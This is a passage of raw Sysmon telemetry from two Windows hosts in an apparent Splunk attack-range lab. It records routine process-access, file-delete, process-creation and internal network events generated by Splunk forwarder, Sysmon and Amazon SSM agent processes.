11:26:51.279{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223155Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:51.279{4F8D34B0-F11C-6215-0C00-000000003902}7283404C:\Windows\system32\svchost.exe{4F8D34B0-F11D-6215-2100-000000003902}2020C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000223154Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:51.279{4F8D34B0-F11B-6215-0500-000000003902}412428C:\Windows\system32\csrss.exe{4F8D34B0-19FB-6216-5B05-000000003902}3408C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000223153Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:51.279{4F8D34B0-F11D-6215-2300-000000003902}20363828C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{4F8D34B0-19FB-6216-5B05-000000003902}3408C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000223152Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:51.280{4F8D34B0-19FB-6216-5B05-000000003902}3408C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe8.0.2Windows Print Monitor splunk ApplicationSplunk Inc.splunk-winprintmon.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-winprintmon.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{4F8D34B0-F11B-6215-E703-000000000000}0x3e70SystemMD5=36D3753920C5BBCA16D12DEAD7A3A904,SHA256=EA17F69FB116CFA6ADC3CE07EBBAE3FD2CB221F25E3F7A9ADF3F15DA051831E2,IMPHASH=264D4B9546D98D77D97F569F55A0B748{4F8D34B0-F11D-6215-2300-000000003902}2036C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000223151Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:51.027{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C4008804A417773AA900095665A7463A,SHA256=86D2992CB6B4B5101F2E756910714B7FCFD7A149F14EBACC62CFA54F09A80F7B,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299281Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:52.225{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=589D7D1E4BF4CB6F36047AE27A702924,SHA256=48C73EA56D2D79BA07FEFCF401AB812B5AC401BBF1D57CAFE0AE00FC28B80326,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000299280Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:49.518{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49600-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000223169Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:52.702{4F8D34B0-F11D-6215-1D00-000000003902}1876NT AUTHORITY\SYSTEMC:\Program Files\Amazon\SSM\amazon-ssm-agent.exeC:\ProgramData\Amazon\SSM\InstanceData\i-04ffbe17aee3fbf0d\channels\health\surveyor-20220223083230-170MD5=97EF2A570B75C4F95FC69B0D09A2E2A2,SHA256=11396EA313B0ED7E3228C4FA92ABE9D836DB8F416A7A8A28ACC77133025082E7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223168Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:52.294{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=64E04B2A75537F6DC2D5C277C1C25D69,SHA256=4E02D51326D8D9BD4D0DC5596D3C84C691661BBFF0FAD8ACDC131F0C49C9D231,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223167Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:52.029{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FBB4D229820836ECF3AD5835855EC44C,SHA256=961620E7AB48E9272134BEBC2496607255EE6A64E02D04303DD3B78E930F2D40,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299282Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:53.240{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=8412C203A0ADECC16EF4018905F49EAA,SHA256=034EB9A9F429F351B570B30817EC507429F75AE450194B643D213DDFE4B3BE43,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223170Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:53.031{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B352B7A3EA703DC1A90AE1F65E352C8C,SHA256=506D4CD58C5FEA0307B11FA10B55A94EA1D70DFB7FA1F435A30945EF3E456B01,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299283Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:54.241{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4812F559F965B0928D3F41B0811E58EA,SHA256=C6FCB3D1CBF5D944BD0937615DE5351BA3144F556409193C511BDF5C541461FB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223171Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:54.033{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A4EC90D57BC02EBC6DB4665F16B9348D,SHA256=FC5295B761D31461ABDABA0EE57541B2A819D55BCBBC87EB894ED2D9B8D3FEEF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299284Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:55.276{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3934D2E2ADD193005F45FFF6B9E7B9E0,SHA256=EB68AA49BFE267F1A40EA29E98754F7AD84F8CBD522256A0BA6D7E00B3C96B4D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223172Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:55.033{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1DA090EC06A4357D5F2BCB7757ED1094,SHA256=536BF8C2ADE03B0E308F4EB6BDCC6EF26484B8E3E45724D2A3F6F8534D4D411E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299285Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:56.292{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7087DCECBD47D358D527C65E5F86978B,SHA256=EF402CD116710CFDC016E1858643E4A09AE67828B1E7509B658D342698F50CBE,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000223174Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:54.630{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51765-false10.0.1.12-8000- 23542300x8000000000000000223173Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:56.049{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=05A7DF71AF58FA72C03743DF8ED0A05A,SHA256=97BA716CE3F27D0A9A3723E30DF68843ABDAB7F405620059EE639EB37B6EC450,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299286Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:57.339{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0106EDEB6890EA7E956BC30A0C461B58,SHA256=5D81C2376D8CC94D7C81F8D0278D72A407BD77ABE96DC737AC3CB4BF34C66F6A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223175Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:57.064{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F03F2EC2C8D9522E098CC3BC71359935,SHA256=F463E6893740FA04A2995459722F5FA3387CFD989D887E17EFD8FBC305CAF4FF,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299288Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:58.354{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9290F2F782CE9DFDE3296782735A0E19,SHA256=68E7A95C67643E72CA8F28FF5202F4F998406789297657F49E26DFD3D971F113,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223176Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:58.095{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=7B834C0D81AEB3AFF13A1CF687E9532F,SHA256=3547478B80B37C63ABCB36E090A440BC6EA2712E1CDCF2E2327CED778D5C4E4F,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000299287Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:55.533{C8EA50B7-F13C-6215-6E00-000000003802}3696C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-tcontreras-attack-range-173.attackrange.local49601-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000299289Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:26:59.372{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FCACF68228C122D3B76E28981EE90CD7,SHA256=C3BC8906CA36A5AFA2787DA392A9077D081A2936F6EB8074E5A8C40A2A6A072A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223177Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:59.111{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3C52B1031A40F958F84FCC7DBA900206,SHA256=36DCBB1B937F50DE128BC79287A9E04738CB7B044CC99C8DC768CF0FD8A1CDA4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000299290Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:00.390{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6CFDB0F0BCE7C6BEFFC66EFABE49AA48,SHA256=4CBB061964C99FAE4EBDBCD669A1D21153D25C455409275C4D8E2DF69FE783F4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000223178Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:00.142{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=16586DF96BA7DD7AAB2F2A3EC07571B0,SHA256=68E8C2309773D80306CD0EF0A83ECF3A12C158AF8D463029B8E1538C1A4D43DF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x8000000000000000299299Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:01.474{C8EA50B7-F132-6215-3800-000000003802}34843504C:\Windows\system32\conhost.exe{C8EA50B7-1A05-6216-7607-000000003802}4172C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299298Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:01.474{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299297Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:01.474{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299296Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:01.474{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299295Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:01.474{C8EA50B7-F11F-6215-0C00-000000003802}8281468C:\Windows\system32\svchost.exe{C8EA50B7-F130-6215-2A00-000000003802}3060C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a563|C:\Windows\System32\RPCRT4.dll+d5bc1|C:\Windows\System32\RPCRT4.dll+52d3c|C:\Windows\System32\RPCRT4.dll+358e4|C:\Windows\System32\RPCRT4.dll+347fd|C:\Windows\System32\RPCRT4.dll+350ab|C:\Windows\System32\RPCRT4.dll+20e9c|C:\Windows\System32\RPCRT4.dll+2131c|C:\Windows\System32\RPCRT4.dll+1049c|C:\Windows\System32\RPCRT4.dll+11cfb|C:\Windows\System32\RPCRT4.dll+1a5ca|C:\Windows\SYSTEM32\ntdll.dll+1d35e|C:\Windows\SYSTEM32\ntdll.dll+1ecc9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 10341000x8000000000000000299294Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:01.472{C8EA50B7-F11C-6215-0500-000000003802}412368C:\Windows\system32\csrss.exe{C8EA50B7-1A05-6216-7607-000000003802}4172C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6144|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5179f 10341000x8000000000000000299293Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:01.472{C8EA50B7-F130-6215-3000-000000003802}25121124C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{C8EA50B7-1A05-6216-7607-000000003802}4172C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7414|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51791 154100x8000000000000000299292Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:01.470{C8EA50B7-1A05-6216-7607-000000003802}4172C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe10.0.10011.16384SplunkMonNoHandle Control ProgramWindows (R) Win 7 DDK driverWindows (R) Win 7 DDK providerSplunkMonNoHandle.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk-MonitorNoHandle.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{C8EA50B7-F11D-6215-E703-000000000000}0x3e70SystemMD5=BF28C74E12839E40CD89696C7CB01573,SHA256=6187325F302F232DE582FE28E0E0D2B292AB8122C3356C9CE295A482D7B93EA3,IMPHASH=27776F2813155A6CF34F6A075A0C2EC8{C8EA50B7-F130-6215-3000-000000003802}2512C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 23542300x8000000000000000299291Microsoft-Windows-Sysmon/Operationalwin-dc-tcontreras-attack-range-173.attackrange.local-2022-02-23 11:27:01.437{C8EA50B7-F144-6215-7700-000000003802}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2091B81163EFC907A978B61E06CF5B06,SHA256=F256FF3AF0E63E9476CD9E5ACDD1A1A1DE32F19D8D1152B213834DFBB1963859,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000223180Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:26:59.693{4F8D34B0-F12B-6215-5B00-000000003902}3916C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-tcontreras-attack-range-985.eu-central-1.compute.internal51766-false10.0.1.12-8000- 23542300x8000000000000000223179Microsoft-Windows-Sysmon/Operationalwin-host-tcontreras-attack-range-985-2022-02-23 11:27:01.377{4F8D34B0-F133-6215-6C00-000000003902}2564NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program 